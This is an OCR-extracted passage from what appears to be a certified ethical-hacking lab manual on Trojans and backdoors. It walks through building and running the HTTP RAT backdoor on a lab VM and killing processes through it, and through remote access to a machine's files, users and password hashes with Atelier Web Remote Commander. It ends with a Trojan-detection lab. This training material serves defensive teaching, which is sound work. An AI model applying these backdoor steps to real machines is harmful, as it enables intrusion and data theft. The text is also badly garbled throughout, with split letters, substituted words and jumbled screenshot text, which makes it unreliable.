  • 31. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs ‫י‬ H TTP RAT located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and BackdoorsTrojans TypesH TTP H T T PS TrojansH TTP RAT T R O JA N ■ A com puter running W indow Server 2008 (host) ■ W indow s 8 running 111 Virtual M achine ■ W indow s Server 2008 111 Virtual M achine ■ I f you decide to dow nload the la te s t versio n , then screenshots shown in the lab m ight d iffer ■ Y o u need a w eb browser to access In tern et ■ Adm inistrative privileges to run tools L a b D u r a t io n Tim e: 20 M inutes O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A Trojan is a program that contains m alicio u s or harm ful code inside apparently harmless programming or data 111 such a w ay diat it can get co n tro l and cause damage, such as ruining die file allocation table on a hard dnve. Note: The versions o f die created client or host and appearance m ay differ from w hat it is 111 die lab, but die actual process o f connecting to die server and accessing die processes is same as shown 111 diis lab. Lab T ask s HTTP RAT 1. Log 111 to W indow s 8 Virtual M achine, and select die Sta rt menu by hovering die mouse cursor on die lower-left corner of die desktop, u Rtcytlt D m * a M o»itla firefox Google Chremr Windows 8 Release Previev. ‫ח ■׳‬ > ‫ז‬ 8 Evaluation copy Build 840C FIGURE 5 :Windows 8Startm u .1 en 2. C E H La b M anual Page 454 Click Se rvice s ui the Sta rt menu to launch Services. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 32. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs S ta rt Google Chrome m m 9 Video Mozilla Firefox ................. ‫5 י‬ 4 ‫י‬ services * < 3, W ier eaO rm m ■ B Calendar Intonei Explorer O ktop cB Uapt a m >PP1:1 ■: h e " u '.a Wide Web Publisher is m andatory a HTTP RAT s runs on port 8 0 Slcfe S SfcyDrwe ^ FIGURE 5 :Windows 8Startm uA .2 en pps _ . ,, _ 3. D isable/Stop W orld W ide W eb Publishing Services. File Action View Hdp + 1H 1a m 0 ebi » Services ; lo c a l) World Wide Web Pubbhng Service Name Description Status Startup Type Log A 3 4 ‫־‬Windows Firewall Windows F1 ._ Running Automatic Loc Windows Font Cache Service Optimizes p... Running Automatic Loc Windows Image Acquisitio... Manu3l Windows Installer Description: Provides im... Adds, modi... Menusl Loc Provides Web comectr/rty and admin straton through the Interret Automatic LOC •^W indows Media Player Net... V Windows Management Inst.. Provides a c... Shares Win... Manual Net Infemotion Services Manager ‫ ־‬W in d o w s Modules Installer ^ Enables inst... Manual £$ V/indows Process Activatio... TheWindo... ‫ $ ׳‬Windows Remote Manage... £ Running Windows R... Running Manual Menusl Net Running Automatic (D._ Loc Provides inf... M enjsl (Tng... LOC Maintains d... Manual (Tng.. Loc Enables th e ... Manual (Tng... Loc Windows Search Provides CO.- Windows Store Service (W5... Windows Tim# Q Windows Update *%W'1 nHTTP Web Proxy Auto ... WinHTTP i... '•& WLAN AutoConfig ■I^WM Performance Adapter Running Provide; p#.. Workstation P I World Wide Web Publnhin... . WWAN AutoConfig Menusl Loc Manual L0C Menual The W ired... The WLANS... 3% Wired AutoConfig LO C Manual loc Cr«at«c and... Running Automatic Ntt Provide! W... Running Menusl u Menual L0C v > This service .. < M Mended ^Standard/ FIGURE 5 : Administrative tools - Services Window .3 > 4. Right-click the W orld W ide W eb Pu blish in g service and select Pro p ertie s to disable the service. C E H La b M anual Page 455 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 33. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs World Wide Web Publishing Service Properties (Local... Genera1 Log On Recovery Dependencies Service name: W3SVC Display name: World Wide Web Publishing Service ivides Web connectivity and administration ugh the Internet Information Services Manager Description: 5 Path to executable: C:Windowssystem32svchost.exe -k iissvcs Startup type: Disabled Helo me configure service startup options. Service status: Stopped Start Pause Stop Resume You can specify the start parameters that apply when you start the service from here Start parameters OK Cancel Apply FIGURE 5 : Disable/Stop World Wide Web publishing services .4 5. N o w start H T T P R A T from die location Z:CEH-ToolsCEHv8 M odule 06 Trojans and BackdoorsTrojans TypesHTTP H TTPS TrojansHTTP RAT T RO JA N . HTTP RAT 0.31 □ r V 'k H T T P R A T f - W !b a c k d o o r W e b s e rv e r J by zOmbie IUUI The sendnotification option can b usedto send e the details to your Mail ID ?J latest version here: [http://freenet.am/~zombie] ‫ו‬ settings W send notification with ip address to m ail SMTP server 4 sending m ail u can specify several servers delimited with ; sm m ru;some. other, sm server; tp. ail. tp. your email address: |you@mail.c I.com close FireWalls Create server port: [80" Exit FIGURE 5 : HTTP RAT m window .5 ain 6. Disable die Send notification w ith ip address to m ail opdon. 7. C E H La b M anual Page 456 C lick C reate to create a httpserver.exe hie. E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 34. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs □ HTTP RAT 0.31 E ll / V K H T T P R A T ^kackdoor Webserver if •T J h 20m ■ y bie v0.31 I 1 . latest version here: [http://freenet.am/~zombie] seiuriys send notification with ip address to mail| SMTP server 4 sending m ail u can specify several servers delimited with ; |sm m ru;some. other, sm server; tp. ail. tp. your email address: |you@mail.com 1 close FireWalls | i Create j| server port: 80 ‫־‬ Exit __ FIGURE 5 : Create backdoor .6 HTTP RAT 0.31 02 The created httpserver will b placedin e the tool directory / V H T T P R A T I -W ^backdoor Webserver done! la done send httpserver.exe 2 victim r c OK |you@mail.com w close FireWalls server pork:[ Create Exit FIGURE 7.‫ :כ‬Backdoor server created successfully 8. The httpserver.exe tile should be created 111 die folder Z:CEHv8 M odule 06 Trojans and BackdoorsTrojans TypesHTTP H TTPS TrojansHTTP RAT T R O JA N 9. C E H La b M anual Page 457 Double-click die tile to and click Run. E th ic a l H ack in g and Countenneasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 35. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs HTTP RAT TROJAN Application Tool* Momgc m Clipboard o ® I to • | N3me 4 Downloads | ‫ ״ח‬S elect aone O p e n File ‫ ־‬S e c u rity W a rn in g [gj ‫ה־‬ Name htlpscfvcr | ...TTP HTTPS TrojansHTTP RAT TROJANhttpservcr.cxc ‫־־‬Publisher: Unknown Publisher *S&l Recent places Type Application 1 . readme ^ □ D Inrert <elert10n The publisher could not bp verified. Are you dire you want to run thk software? Z ittpiat Desktop EE s««t >1 1 01 « HITPHTIPS Trojans > Favorites ■ to* <harcut SI Open ‫י‬ 0 Edit <t) History od [3P«te * BQ Newitem ‫י‬ E syaccess ‫י‬ a IS □ I* C" / path -J From: Z:CEHv8 Module06 Trojans and Backdoors JrojansT‫״‬ Libraries 1 1 Documents 11 Run Music B Cancel Pictures g£ Videos ^3. Homegroup This file docs not have ‫ ג‬valid digital signature that verifies its publisher. You should only run software from publishers you trust Hwc nI drid wa to a tom? e a e e h t ftiv re n T® Computer i l . Local Oslr (C:) 4-‫ ׳‬CEH-Tcols (10. Ip Admin (admin-p 4 items 1item selected iO.: K B FIGURE 5 : Running the Backdoor .8 10. G o to T ask M anager and check if die process is running. File Options Processes View Performance App history Startup Users Details Services 4 % 0% 30% 52% M em o ry D isk N e tw o rk 6 MB .8 0 MB/s 0 Mbps 0% Status CPU 1.9% Name 25.1 MB 0.1 MB/s 0 Mbps 0 Mbps A p p s (2 ) Task Manager > > ^ Windows Explorer B a c k g r o u n d p r o c e s s e s (9 ) H Device Association Framework... Microsoft Windows Search Inde... tflf' Print driver host for applications m 0% 3.3 MB 0 MB/s 0 % S I Httpserver (32 bit) 1.2 MB 0 MB/s 0 Mbps 0% 4.9 MB 0 MB/s 0 Mbps 0 Mbps l i l Snagit RPC Helper (32 bit) 1.0 MB 0 MB/s 22.4 MB 0.1 MB/s 0 Mbps 0% j[/) Snagit Editor (32 bit) 0% 19.7% Snagit (32 bit) 19.2 MB 0 MB/s 0 Mbps 0 Mbps 1.7% 0.9 MB 0 MB/s OR) Spooler SubSystem App 0% 1.5 MB 0 MB/s 0 Mbps 0 t> 0% 0.8 MB 0 MB/s 0 Mbps TechSmith HTML Help Helper (... W i n d o ‫ : •.׳‬v f f ’‫־ '־-־‬r ‫־‬ ;‫.־‬ , ~‫: ׳‬ ( * ) Fewer details FIGURE 5 : Backdoor runningin taskm .9 anager 11. G o to W indow s Server 2008 and open a web browser to access die W indow s 8 m achine (here “ 10.0.0.12” is die IP address ot W indow s 8 M achine). C E H La b M anual Page 458 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 36. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs *Drabe'S K RA TTP T c | I £ « ‫ ״‬iooale P] * D - w elcom e 2 IITTP_RAT infected com puter }:] .es] [brov!6«] [comouter info] [stoo httorat] [have auaaestions?] [homeoace] w plrnm e } : J FIGURE 5 0 Access the backdoor in Host web browser .1 : 12. C lick running processes to list the processes running on die W indow s 8 machine. Z>nbe's HTTP_RAT 1 ■ & 1. . .iQC , 4 0 0Zf ______ 0 O C ? 1 ‫ ־‬ioojle P A E- running processez: ] ]system Process ]S/stem I kill ] srrss.exe [kill ]!M [ ]!M [ v ‘ninit.exe fkilll * 1 w nlogon.exe fkilll ]services.exe f kill ]!!lsass.exe [k i v h c x r111n c o to a <; vcho5t.exe f: svchostexe f kilfl dvirr.exe Ik illl ]svchostexe [kill evehoct.axa [MID vchost.cxa [UdD: ]svchostexe [hjjj spoolsv.exe [kilfl )svchostexe |kill ]svchostexe [kill d3cHoct.ova f l-illl MsMpCng.exe fk illl vc.hus»t.«x« fkilll* svchostexe fkilll vchost.exe [ k T iT j ]ta«kh(>*t.*x» [kill bckhoct.sxo ] -‫[יי‬ Mpkxar.tM [M 1 [ search indexer.exe fkilfl ]S>n«g1t32.ex• [jo j ]TscHelp.exe [kill ]SnagPri./.•** [kill ]SragitCditor.exe [ !:ill ]aplmjv164.exe f k ill svchostexe fkilll ]httpserver.exe (kill ]Taskmor.«*x® [kill firofox O O [UJJ[ .X 5 FIGURE 5 1 Process list of die victim com .1 : puter 13. Y o u can kill any running processes from here. L a b A n a ly s is Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posture and exposure dirough public and free mformadon. C E H La b M anual Page 459 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 37. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs P LEA S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T IO N S R E L A T E D T O T H I S LAB. T o o l/ U tility In fo rm a tio n C o lle c te d / O b je ctive s A ch ie ve d Successful send httpserver.exe 011 victim m achine O u tp u t: K ille d Process System smss.exe csrss.exe H T T P T ro ja n w inlogon.exe serv1ces.exe lsass.exe svchost.exe dwm .exe splwow64.exe httpserver.exe firefow .exe Q u e s t io n s 1. Determ ine the ports that H T T P proxy server Trojan uses to communicate. In te rn e t C o n n ectio n R e q u ire d □ Y es 0 No P la tfo rm Su p p o rted 0 C lassro o m C E H La b M anual Page 460 0 iLab s E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 38. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs R e m o te A c c e s s T r o ja n s U s in g A te lie r W e b R e m o te C o m m a n d e r .4 T ro ja n is a p ro g ra m th a t c o n ta in s m a lic io u s o r h a rm fu l cod e in s id e a p p a re n tly h a rm le s s p ro g ra m m in g o r d a ta in d am ag e, su ch a s m in in g th e f ile I C O N K E Y / V a lu a b le in fo r m a tio n y 5 T est yo u r k n o w le d g e TTT TT W e b e x e rc is e su ch a 1r a j th a t it ca n g e t c o n tro l a n d cau se a llo c a tio n ta b le o n a h a rd d riv e . L a b S c e n a r io A backdoor T rojan is a very dangerous in fection that com prom ises the integrity o f a com puter, its data, and the personal inform ation o f the users. Rem ote attackers use backdoors as a means o f accessing and taking control o f a com puter that bypasses security m echanism s. Trojans and backdoors are types o f bad-wares; their m ain purpose is to send and receive data and especially com m ands through a port to another system. T his port can be even a well- m W o r k b o o k r e v ie w know n port such as 80 or an out o f the norm ports like 7777. Trojans are m ost o f the tim e defaced and shown as legitim ate and harm less applications to encourage the user to execute them. Y o u are a security adm inistrator o f your com pany, and your job responsibilities include protecting the netw ork from Trojans and backdoors, T rojan attacks, theft o f valuable data from the netw ork, and identity theft. L a b O b j e c t iv e s J T Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors The objective o f tins lab is to help students learn to detect T rojan and backdoor attacks. The objectives o f tins lab include: • G ain access to a rem ote com puter • A cquire sensitive inform ation o f the rem ote com puter L a b E n v ir o n m e n t To cany out tins, you need: 1. C E H La b M anual Page 461 A te lie r W eb Rem ote Com m ander located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and BackdoorsTrojans TypesRem ote A cce ss T ro jan s (R A T )A telier W eb Rem ote Com m ander E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 39. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs ■ A com puter running W indow Server 2008 (host) ■ W indow s Server 2003 running 111 Virtual M achine ■ I f you decide to dow nload the la te s t versio n , then screenshots shown 111 the lab m ight d iffer ■ Y o u need a w eb browser to access In tern et ■ Adm inistrative privileges to m il tools L a b D u r a t io n Tim e: 20 M inutes O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A Trojan is a program that contains m alicio u s or harm ful code inside apparently harmless programming or data 111 such a way that it can get co n tro l and cause damage, such as ruining the file allocation table on a hard drive. Note: The versions o f the created client or host and appearance may differ from w hat it is 111 die lab, but die actual process o f connecting to die server and accessing die processes is same as shown 111 diis lab. a* T A S K 1 A telier W eb Rem ote Com m ander Lab T ask s 1. In stall and launch A te lie r W eb Rem ote Com m ander (A W R C ) 111 W indow s Server 2012. 2. T o launch A te lie r W eb Rem ote Com m ander (A W R C ), launch the S ta rt menu by hovering the mouse cursor on the low er-left corner o f the desktop. u § € ■ W d w S rv r21 3 in o s e e 02 su.t MVMom Swvw M l? DMwCMidM• Evaluator cgpt. Eud M 0C . rw *1 3PM 1 FIGURE 6 : Windows Server 2 1 Start-Desktop .1 02 3. C lick AW Rem ote Com m ander Pro fessio n al 111 the S ta rt m enu apps. C E H La b M anual Page 462 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 40. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs Start CtnvUcr Administrator A T fc n £ * Tools AW fieoiote Connwn.. 4 & FIGURE 6 : Windows Server 2 1 Start Menu Apps .2 02 4. The m ain w indow o f AW RC w ill appear as shown 111 the follow ing screenshot. ‫סי‬ File AWRC PRO 9.3.9 Tools Desktop Help Syclnfo Netwarklnfo FJ# Sy*t*fn Uc*rs *r.Grocpc n Chat ‫ ט‬Tliis toll is used to gain access to all the information of die Rem ote system Progress Report y , Connect df Disconnect 0 Request ajthonrabor kBytesIn: C @ dear on iscomect k8psln: 0 Connection Duraton FIGURE 6 : Atelier Web Rem Com ander m window .3 ote m ain 5. In p u t the IP ad dress and U sernam e I Passw o rd o f the rem ote com puter. 6. 1 1 tins lab we have used W indow s Server 2008 (10.0.0.13): 1 ■ U ser name: A dm inistrator ■ Passw ord: qw erty@ 123 N ote: The IP addresses and credentials m ight d iffer 111 your labs 7. C E H La b M anual Page 463 C lick C onnect to access the m achine rem otely. E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 41. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs FIGURE 6 : Providing rem com .4 ote puter details Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors 8. The follow ing screenshots show that you w ill be accessing the W indow s S e rve r 2008 rem otely. 10.0.0.13 :A W R C PRO 9.3.9 S File Tools Desktop Help Syslnfo Networidnfb Fie System Use's anc Groups Chat Internet Explo‫־‬er windows update j Notepad < r & ~ Fastest * T F V *29 Monitors * Remote Host Progress Report | administrator W C o n n ect cf □ Request ajthoniabor k5yle*I11; 201.94 ^ #1 6:28:24 Initializing, p lease w a it... #16:2 8:25 C onnected to 1 0 .0 .0 .1 3 D isconnect @ Clear on iscomect k B ^ IiL 0.87 Cumeiliui 1 Duiatun: !Minute, 42 Seconds. FIGURE 6 : Remote com .5 puter Accessed 9. The Com m ander is connected to the Rem ote System . C lick th eSys Info tab to view com plete details o f the V irtu a l M achine. C E H La b M anual Page 464 E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 42. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs FIGURE 6 : Information of the rem com .6 ote puter 10. Select N etw orklnfo Path w here you can view netw ork inform ation. 10.0.0.13: AWRC PRO 9.3.9 S File Jools Desktop Help Syslnfo | NetworiJnfo | Ffe System Use's anc Grocps Ports Safeties R em ark Perm issions Chat P/Transport Protocols M a x U se s Current U se s Path Passw o id A D M IN S net ap p lica ... unlimited not val■ C$ S p e .. Default share not a p p lic a .. unlimited not v a li IP CS & Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors S p e . R em o te A dm in S p e .. R em o te IP C net applica unlimited not vaN R em ote Host Progress Report # 1 6 .2 8 .2 4 Initializing, p lease wait #1 6 :2 8 :2 5 C onnected to 10 0 .0 .1 3 ^ a f Connect D Request ajthonrabor Ifiytesln: 250.93 A / Disconnect @ dear on iscomect kSpsIn: 0.00 Connection Duraton: 5 Minutes, 32 Seconds. FIGURE 6 : Information of the rem com .7 ote puter 11. Select the F ile System tab. Select c: from the drop-down list and click G et. 12. Tins tab lists the com plete files o l the C : drive o f W indow s Server 2008. C E H La b M anual Page 465 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 43. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs 10.0.0.13: AWRC PRO 9.3.9 file Iools Desktop Help Syslnfo contents of NetworicJnfb I Fie System I Use's and Groups Chat 'c:'______ CIJ SR ecycle Bin C l Boot C 3 D ocum ents and Settin g s C□ PerfLogs D Program Files (x86) □ Program Files C l Program D ata D System Volume Inform... □ U sers □ W indow s File Sy stem : NTFS 6C 2 7 -C D 3 9 C apacity: 1 7 ,1 7 7 ,7 6 7 .9 3 6 bytes F ree space: 6 .5 0 5 .7 7 1 .0 0 8 bytes Fixed Type Serial Number: Labei: Progress Report | administrator ^ Connect cf ]Request ajthoriratxx‫־‬ # 1 6 .2 8 .2 4 Initializing, p lease w a it... Password Disconnect #1 6 :2 8 :2 5 C onnected to 1 0 .0 .0 .1 3 @ Oear on iscomect kBytesIn: 251.64 ConnectonDuraton: 6 Minutes, 18 Seconds. FIGURE 6 : Information of the rem com .8 ote puter 13. Select U sers and G roups, w hich w ill display the com plete user details. 10.0.0.13 :A W R C PRO 9.3.9 File Jools Desktop jUsers '‫" ם: ־‬ Help Syslnfo ^ Groups NetworkJnfo Ffe System Use's anc Groups I Chat Password Ha^ies U se r In fo rm a tio n fo r A d m in is tra to r U ser A cc o un t. A dm inistrator Passw o rd A g e 7 d ays 21 hours 21 m inutes 3 3 seconds Privilege Level: A dm inistrator C om m ent Built-in account for adm inistering th e com puter/dom ain Flags: Logon script executed. Norm al Account. Full Name: W orkstatio n s can log from: no restrictions Last Logon: 9 /2 0 /2 0 1 2 3:58:24 A M Last Logoff Unknown Account expires Never expires U se r ID (R ID ) 500 P n m ary Global Group (RID): 513 SID S 1 5 21 18 58 18 02 43 300731 51 51 16 0 0 5 9 6 2 0 0 50 0 Domain W IN -E G B H IS G 1 4 L 0 No Su b A u th o rtie s 5 Remote Host User Name [ administrator 10.0.0.13 W C o n n ect nf D Request ajthon:at>or kByle* 11 : 256.00 1 ^ D isconnect P assw ord Progress Report #1 6:28:24 Initializing, p lease w a it... #16:2 8:25 C onnected to 1 0 .0 .0 .1 3 @ Oear on iscomect Cumeuiimi3u1atu< 1 e Minutes, 2 6 Seconds. : FIGURE 6 : Information of the rem com .9 ote puter C E H La b M anual Page 466 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 44. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs rs 10.0.0.13: A W R C P R O 9.3.9 file Iools Desktop Help Syslnfo NetworWnfo We System Use's and Groups Chat | Groups ~ | y Passwoid Ha«hes N am e s SID Com m ent Adm inistrators S -1 -5-32 -5 44 (Typo A lia s/D o Adm inistrators have com plete and unrestricted B acku p O p e r a t o r S -1 -5-32-551 (Type A lia s/D o B ac ku p Operators can override security restrict Certificate Service DC S -1 -6 -3 2 -6 7 4 (Type A lia s /D o . M em bers of this group are allowed to co n n ect t« Cryptographic Ooerat S -1 -5 -3 2 -5 6 9 (Type A lia s/D o M em bers are authorized to perform cryptograph Distributed C O M U s e ‫־׳‬ s S -1 -5 -3 2 -5 6 2 (Type A lia s /D o . M em bers are allowed to launch. ac tK ate and us Event Log R eaders 5 -1 -5 -3 2 -5 7 3 (Type A lia s /D o ... M em bers of this group c an read event logs from G u ests Groups: S -1 -5 -3 2 -5 4 6 (Type A lia s/D o G u e s ts have th e sa m e a c c e s s as m em bers o ft III <1 ______I Global G roups: S - 1-5 -2 1 -1 8 5 8 1 8 0 2 4 3 -3 0 0 7 3 1 5 ... O rdinary users Progress Report | administrator ^ Connect cf ]Request ajthonrabor kBytesIn: 257.54 Disconnect # 1 6 .2 8 .2 4 Initializing, p lease w a it... Password #1 6 :2 8 :2 5 C onnected to 1 0 .0 .0 .1 3 @ dear on iscomect Connection Ouraton: ?Minutes, 34Seconds. FIGURE 6 0 Information of the rem com .1 : ote puter FIGURE 6 1 Information of the rem com .1 : ote puter 14. Tins tool w ill display all the details o f the rem ote system. 15. Analyze the results o f the rem ote com puter. L a b A n a ly s is Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posture and exposure dirough public and tree inform ation. C E H La b M anual Page 467 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 45. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs P LEA S E TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T IO N S R E L A T E D T O T H I S LAB. T o o l/ U tility In fo rm a tio n C o lle c te d / O b je ctive s A ch ie ve d Rem otely accessing W indow s Server 2008 R e s u lt: System inform ation o f rem ote W indow s Server 2008 A telier W eb Rem ote Com m ander N etw o rk In form ation Path rem ote W indow s Server 2008 view ing com plete files ot c: o f rem ote W indow s Server 2008 U ser and Groups details o f rem ote W indow s Server 2008 Passw ord hashes Q u e s t io n s 1. Evaluate die ports that A W R C uses to perform operations. 2. Determ ine whether it is possible to launch A W R C from the command line and make a connection. I f ves, dien illustrate how it can be done. In te rn e t C o n n ectio n R e q u ire d □ Y es 0 No P la tfo rm Su p p o rted 0 C lassro om C E H La b M anual Page 468 E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 46. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs D e te c tin g T ro ja n s A T ro ja n is a p ro g ra m th a t c o n ta in s M a lic io u s o r h a rm fu l code in s id e a p p a re n tly h a rm le s s p ro g ra m m in g o r d a ta in su ch a )ra y th a t ca n g e t c o n tro l a n d cau se d am ag e, su ch a s m in in g th e f ile I CON V a lu a b le /^ KEY 1 T est yo u r ______ k n o w le d g e _________ W e b e x e rc is e L a b S c e n a r io M ost individuals are confused about the possible ways to rem ove a T rojan virus in fo r m a tio n .‫■׳י‬ '* a llo c a tio n ta b le o n a h a rd d riv e . ^ from a specific system. O ne m ust realize that the W o rld W id e W eb is one o f the tools that transm its inform ation as w ell as m alicious and harm ful viruses. A backdoor T rojan can be extrem ely harm ful if not dealt w ith appropriately. The m ain function o f tins type o f virus is to create a backdoor 111 order to access a specific system. W ith a backdoor T rojan attack, a concerned user is unaware d W o r k b o o k r e v ie w about the possible effects u n til sensitive and im portant inform ation is found m issing from a system . W ith a backdoor T rojan attack, a hacker can also perform other types ot m alicious attacks as w ell. The other name fo r backdoor Trojans is rem ote access Trojans. The m ain reason that backdoor Trojans are so dangerous is that they hold the ab ility to access a particular m achine rem otely (source: http://w w w .com bofix.org). Y o u are a security7adm inistrator o f your com pany, and your job responsibilities include protecting the netw ork from Trojans and backdoors, T rojan attacks, theft o f valuable data from the netw ork, and identity theft. L a b O b j e c t iv e s The objective o f this lab is to help students learn to detect T rojan and backdoor attacks. The objectives o f the lab include: & Tools dem onstrated in th is lab are availab le in D:CEHToolsCEHv8 M odule 06 Trojans and Backdoors C E H La b M anual Page 469 • Analyze using Po rt ]M onitor • Analyze using Process M o nitor • Analyze using Registry M o nitor • Analyze using Startup Program M o nitor • Create M D 5 hash tiles for W indow s directory files E th ic a l H ack in g and Countem ieasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 47. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs L a b E n v ir o n m e n t To carry out this, you need: ■ T cp view , located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and BackdoorsPort M onitoring T oolsTC PV iew ■ Autoruns, located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and Backd oo rsProcess M onitoring ToolsAutoruns ■ P rcV ie w , located at C:CEH-ToolsCEHv7 M odule 06 T ro jan s and Backd oo rsProcess M onitor ToolPrc V iew ■ Jv 1 6 pow er to ol, located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and Backd oo rsR eg istry M onitoring Toolsjv16 Po w er Tools 2012 ‫י‬ Fsum FrontEnd. located at D:CEH-ToolsCEHv8 M odule 06 T rojan s and Backd o o rsFiles and Fold er In te g rity CheckerFsum Frontend ■ A com puter running W indow Server 2008 (host) & Disabling and Deleting Entries ■ W indow s Server 2003 m nning h i V irtual M achine If you don'twant anentry to active die nest tim you e boot or login you can eidier disable or delete it. To disable an entryuncheckit. Autoruns will store die startup information in a backup location sodiat it canreactivate die entry whenyou recheckit. For item storedin startup s folders Autoruns creates a subfolder nam Autoruns ed disabled. Checka disabled item to re-enableit ■ I f you decide to dow nload the la te s t versio n , then screenshots shown 111 the lab m ight d iffer ■ Y o u need a web browser to access In tern et ■ Adm inistrative privileges to m il tools L a b D u r a t io n Tim e: 20 M inutes O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A Trojan is a program diat contains m alicio u s or harm ful code inside apparently harmless programming or data 111 such a w ay that it can get co n tro l and cause damage, such as ruining the file allocation table on a hard drive. Note: The versions o f the created client or host and appearance may differ from w hat it is 111 the lab, but the actual process o f connecting to the server and accessing the processes is same as shown 111 tins lab. Lab T ask s 1. G o to W indow s Server 2012 V irtual Machine. 2. T cpview Install T cp view from the location D:CEH-ToolsCEHv8 Module 06 Trojans and BackdoorsPort M onitoring ToolsTCPView . 3. The T C P V iew main wm dow appears, w ith details such as Process, Process ID , Protocol, Local address. Local Port, Rem ote Address, and Rem ote Port. C E H La b M anual Page 470 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  • 48. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs T P ie - S C V w ysin rn ls: w w te a w .sysin rn ls.co te a m File O tio s P ce V p n ro ss iew H elp H a h | || P c ss > ro e P ID P to o ro c l C l dns. exe 1572 IC P T7d se e n. x 17 52 IC P T7d se e n. x 17 52 tCP T7d se e n. x 17 52 UP D i- d se e n. x 17 52 UP D I"7d se e n. x 17 52 UP D i7 d se e ‫ ־‬n. x 17 52 UP D i"7d se e n. x UP D 17 52 IF d se e n. x 17 52 UP D » d se e n. x 17 52 UP D 1‫ י‬d se e n. x 17 52 UP D »1d se e n. x 17 52 UP D T7d se e n. x 17 52 UP D r d se e n. x 17 52 UP D » d se e n. x 17 52 UP D T d se e n. x 17 52 UP D ‫ י‬d se e n. x 17 52 UP D r d se e n. x 17 52 UP D ‫ י‬d se e n. x 17 52 UP D ‫ ׳ י‬d se e n. x 17 52 UP D 1 d se e ‫ ־‬n. x 17 52 UP D 1 d se e n. x 17 52 UP D T d se e n. x 17 52 UP D •‫ ו‬d se e n. x 17 52 UP D • d se e n. x 17 52 UP D III ‫1־‬ 03 Should delete item that s you do notwish to ever execute. Do so bychoosing Delete in the Entry m enu. Only die currendy selected itemwill be deleted L c lA d s o a d re s win-2n9stosgien W - N S 0G IN 2 9 T S I.. W - N S OG IN 2 9 T S L w - n so g n in 2 9t $ ie W -2 9 0 L IN N ST SG W - N S 0G IN 2 9 T S I.. W - N S OG IN 2 9 T S L W -2 9 0 L IN N ST SG W - N S OG IN 2 9 T S L W - N S OG IN 2 9 T S L W - N S 0G IN 2 9 T S I.. W - N S OG IN 2 9 T S L W -2 9 0 L IN N ST SG W - N S OG IN 2 9 T S I.. W - N S OG IN 2 9 T S L W - N S OG IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N S 0G IN 2 9 T S I.. W - N ST SG IN 2 9 0 L W - N S OG IN 2 9 T S L W - N S OG IN 2 9 T S I.. W - N S OG IN 2 9 T S L L ca P tt o lo domain d min oa 417 95 d min oa d min oa 412 95 413 95 414 95 415 95 416 95 417 95 418 95 419 95 410 96 411 96 412 96 413 96 414 96 415 96 416 96 417 96 418 96 419 96 410 97 411 97 w fl Vl ‫׳‬ / W l V 1 